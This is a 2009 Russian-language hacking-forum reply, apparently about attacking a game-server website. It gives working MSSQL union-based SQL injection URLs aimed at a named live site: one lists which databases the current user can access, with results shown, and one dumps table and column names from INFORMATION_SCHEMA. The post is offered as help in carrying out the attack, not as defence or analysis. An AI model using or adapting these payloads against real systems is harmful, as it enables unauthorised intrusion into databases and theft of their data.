16.03.2009, 12:17
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
С нами:
10077446
Репутация:
1020
|
|
Сообщение от fedi
мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
хоть я не очень дружу с MSSQL но так на вскидку:
смотрим базы доступные текушему пользователю(0- нет доступа, 1 - доступ есть):
PHP код:
http://darkomen.ru/?go=19&indx=-11+union+all+select+1,2,HAS_DBACCESS(DB_NAME(0)),4,5,6,7,DB_NAME(0),9,1,1,1--
lin2world - 1
master - 1
tempdb - 1
model - 0
msdb - 1
lin2db - 0
lin2comm - 0
l2gloss - 0
lin2world - 1
lin2log - 0
lin2clancomm - 0
смотрим таблички и колонки доступные текушему пользователю
PHP код:
http://darkomen.ru/?go=19&indx=-1+union+select+1,2,QUOTENAME(TABLE_NAME),4,5,6,7,QUOTENAME(COLUMN_NAME),9,1,1,1+from+INFORMATION_SCHEMA.COLUMNS--
крч ничего особено хорошего нету.
|
|
|